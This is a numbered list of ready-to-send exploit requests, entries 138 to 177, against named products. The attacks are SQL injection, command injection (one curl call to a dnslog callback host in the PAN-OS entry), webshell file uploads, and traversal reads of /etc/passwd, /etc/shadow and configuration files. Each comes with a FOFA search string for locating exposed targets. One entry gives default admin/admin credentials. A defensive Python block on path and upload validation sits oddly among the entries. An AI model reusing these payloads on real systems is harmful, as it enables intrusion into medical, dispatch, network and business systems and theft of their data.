GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. 福建科立讯 communications command-and-dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. 福建科立讯 communications command-and-dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. 福建科立讯 communications command-and-dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. 建科立讯 communications command-and-dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass / template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. 天维尔 fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. 六零导航页 (LyLme Spage) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the file path echoed in the response: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. Meite CRM (美特CRM) upload.jsp Arbitrary File Upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL Injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. INFINITT (英飞达) Medical Image Archiving and Communication System WebJobUpload Arbitrary File Upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 Directory Traversal and File Read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. Keytop (科拓) Smart Parking Fee System Webservice.asmx Arbitrary File Upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field sets the file name and the <fileFlow> field carries the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx
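The step above joins a client-supplied <fileName> into a filesystem path without checking it, and entries 160, 167, 170, 172, 174 and 188 read files through the same missing check in the other direction. The Python below is an added defender-side example, not code from this compilation or from any of the listed vendors: it shows how a server should validate a client-supplied file name or relative path before using it (percent-decode until the value stops changing, refuse any `..` segment, confine the result to the upload directory) and how an upload handler can enforce an extension allowlist so that the .jsp, .aspx and .php names seen throughout these entries are refused. The base directory and the allowlist are assumed values chosen for the example.

```python
import posixpath
import re
from urllib.parse import unquote

# Assumed allowlist for the example; a real deployment sets its own.
ALLOWED_UPLOAD_EXTENSIONS = {"png", "jpg", "jpeg", "gif", "pdf", "txt"}

# A bare name: safe characters, exactly one extension, no directories.
SAFE_NAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,8})$")


def decode_fully(raw: str, max_rounds: int = 5) -> str:
    """Percent-decode until the value is stable (so %252e%252e is caught
    as well as %2e%2e) and fold backslashes into forward slashes so that
    '..\\' is treated exactly like '../'."""
    value = raw
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/")


def safe_join(base_dir: str, user_path: str):
    """Resolve a client-supplied relative path under base_dir.

    Returns the normalized path, or None when the input contains a NUL
    byte, any '..' segment, or would resolve outside base_dir. '..' is
    refused outright rather than normalized away, so a value such as
    'UploadFile/../Web.Config' is rejected even when the normalized
    result would still sit under the web root."""
    if "\x00" in user_path:
        return None
    rel = decode_fully(user_path).lstrip("/")
    if any(seg == ".." for seg in rel.split("/")):
        return None
    base = posixpath.normpath(base_dir)
    candidate = posixpath.normpath(posixpath.join(base, rel))
    if candidate == base or not candidate.startswith(base + "/"):
        return None
    return candidate


def allowed_upload_name(filename: str) -> bool:
    """Accept only a bare file name with one extension from the allowlist:
    no path separators, no server-side script extensions, no double
    extensions such as shell.php.png."""
    m = SAFE_NAME_RE.match(filename)
    return bool(m) and m.group(1).lower() in ALLOWED_UPLOAD_EXTENSIONS


if __name__ == "__main__":
    # Values taken from the entries above (constructed base directory).
    for p in ("../../../../dizxdell.aspx", "UploadFile/../Web.Config", "sub/dir/file.txt"):
        print(repr(p), "->", safe_join("/srv/uploads", p))
    for n in ("kjldycpvjrm.jsp", "qaz.aspx", "report.pdf"):
        print(repr(n), "->", allowed_upload_name(n))
```

Both checks belong on the server side of the upload or download handler; a Content-Type of image/png in the request, as several entries here send, says nothing about the bytes that follow and must not be used as the filter.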

162. Hefeng (和丰) Multimedia Information Publishing System QH.aspx Arbitrary File Upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. Haoka Jituan (号卡极团) Distribution Management System ue_serve.php Arbitrary File Upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. Smart Campus (慧校园/安校易) Management System FileUpProductupdate.aspx Arbitrary File Upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL Injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. Zhongcheng Kexin (中成科信) Ticketing Management Platform SeatMapHandler SQL Injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. Lean Value Management System (精益价值管理系统) DownLoad.aspx Arbitrary File Read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. Hongjing EHR (宏景EHR) OutputCode Arbitrary File Read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. Hongjing EHR (宏景EHR) downlawbase SQL Injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. Hongjing EHR (宏景EHR) DisplayExcelCustomReport Arbitrary File Read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. Tongtianxing (通天星) CMSV6 Vehicle Positioning and Monitoring Platform SQL Injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD License Plate Recognition Camera (DT-高清车牌识别摄像机) Arbitrary File Read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point Security Gateway Arbitrary File Read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. Jinhe OA (金和OA) C6 FileDownLoad.aspx Arbitrary File Read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. Jinhe OA (金和OA) C6 IncentivePlanFulfill.aspx SQL Injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom Gateway Configuration Management System (电信网关配置管理系统) rewrite.php File Upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C Router Sensitive Information Disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
